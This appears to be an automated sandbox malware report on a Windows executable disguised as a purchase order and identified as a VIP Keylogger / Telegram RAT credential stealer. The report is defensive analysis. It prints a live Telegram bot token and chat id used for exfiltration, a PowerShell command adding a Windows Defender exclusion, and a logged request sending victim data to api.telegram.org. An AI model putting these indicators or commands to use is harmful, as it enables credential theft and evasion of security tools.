Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Overview

General Information

Sample name:PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Analysis ID:1576077
MD5:4b393b41e5b7bdd02e481816bec9ff4a
SHA1:35b60bdfa5130cc88b508f4fee9c226a2277517b
SHA256:b71fb82589e3532a9390352bc87f7c2edc2cd7fae723fe203500350a31559e17
Tags:exeuser-adrian__luca
Infos:

Detection

VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe (PID: 2896 cmdline: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe" MD5: 4B393B41E5B7BDD02E481816BEC9FF4A)
    • powershell.exe (PID: 5216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d031:$a1: get_encryptedPassword
          • 0x2d346:$a2: get_encryptedUsername
          • 0x2ce41:$a3: get_timePasswordChanged
          • 0x2cf4a:$a4: get_passwordField
          • 0x2d047:$a5: set_encryptedPassword
          • 0x2e6e5:$a7: get_logins
          • 0x2e648:$a10: KeyLoggerEventArgs
          • 0x2e2ad:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d231:$a1: get_encryptedPassword
                  • 0x2d546:$a2: get_encryptedUsername
                  • 0x2d041:$a3: get_timePasswordChanged
                  • 0x2d14a:$a4: get_passwordField
                  • 0x2d247:$a5: set_encryptedPassword
                  • 0x2e8e5:$a7: get_logins
                  • 0x2e848:$a10: KeyLoggerEventArgs
                  • 0x2e4ad:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 26 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ParentImage: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ParentProcessId: 2896, ParentProcessName: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ProcessId: 5216, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ParentImage: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ParentProcessId: 2896, ParentProcessName: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ProcessId: 5216, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ParentImage: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ParentProcessId: 2896, ParentProcessName: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ProcessId: 5216, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T14:14:19.127433+010028033053Unknown Traffic192.168.2.449737172.67.177.134443TCP
                  2024-12-16T14:14:29.738608+010028033053Unknown Traffic192.168.2.449747172.67.177.134443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T14:14:14.630603+010028032742Potentially Bad Traffic192.168.2.449734132.226.8.16980TCP
                  2024-12-16T14:14:17.427453+010028032742Potentially Bad Traffic192.168.2.449734132.226.8.16980TCP
                  2024-12-16T14:14:20.739935+010028032742Potentially Bad Traffic192.168.2.449738132.226.8.16980TCP
                  2024-12-16T14:14:24.224485+010028032742Potentially Bad Traffic192.168.2.449740132.226.8.16980TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277", "Version": "4.4"}
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7340.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeReversingLabs: Detection: 78%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49984 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49991 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49994 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50004 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50007 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50020 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50033 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50040 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50049 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50053 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50058 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50062 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50066 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50071 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50074 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50079 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50108 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50110 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50112 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50114 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50116 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50118 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50120 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50122 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50124 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50126 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50128 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50130 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50134 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50136 version: TLS 1.2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: System.Windows.Forms.pdb source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdbt source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0B889D1Dh0_2_0B889516
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0B889D1Dh0_2_0B889569
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0273F475h4_2_0273F2D8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0273F475h4_2_0273F4C4
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0273FC31h4_2_0273F98C
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05357EB5h4_2_05357B78
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05359280h4_2_05358FB0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535C826h4_2_0535C558
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05350FF1h4_2_05350D48
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535E816h4_2_0535E548
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05351449h4_2_053511A0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053518A1h4_2_053515F8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535CCB6h4_2_0535C9E8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535ECA6h4_2_0535E9D8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053562D9h4_2_05356030
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535BF06h4_2_0535BC38
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535DEF6h4_2_0535DC28
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053532B1h4_2_05353008
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05353709h4_2_05353460
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053502E9h4_2_05350040
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535E386h4_2_0535E0B8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then mov esp, ebp4_2_0535B090
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05350741h4_2_05350498
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then mov esp, ebp4_2_0535B081
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05356733h4_2_05356488
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05350B99h4_2_053508F0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535C396h4_2_0535C0C8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053579C9h4_2_05357720
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053555D1h4_2_05355328
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535B5E6h4_2_0535B318
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053525A9h4_2_05352300
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535D5D6h4_2_0535D308
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05352A01h4_2_05352758
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05352E59h4_2_05352BB0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535BA76h4_2_0535B7A8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535DA66h4_2_0535D798
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05355A29h4_2_05355780
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535FA56h4_2_0535F788
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05355E81h4_2_05355BD8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 053548C9h4_2_05354620
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05356CC1h4_2_05356A18
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05357119h4_2_05356E70
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05354D21h4_2_05354A78
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535D146h4_2_0535CE78
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535F136h4_2_0535EE68
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05351CF9h4_2_05351A50
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05352151h4_2_05351EA8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 0535F5C6h4_2_0535F2F8
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05355179h4_2_05354ED0
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4x nop then jmp 05357571h4_2_053572C8

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
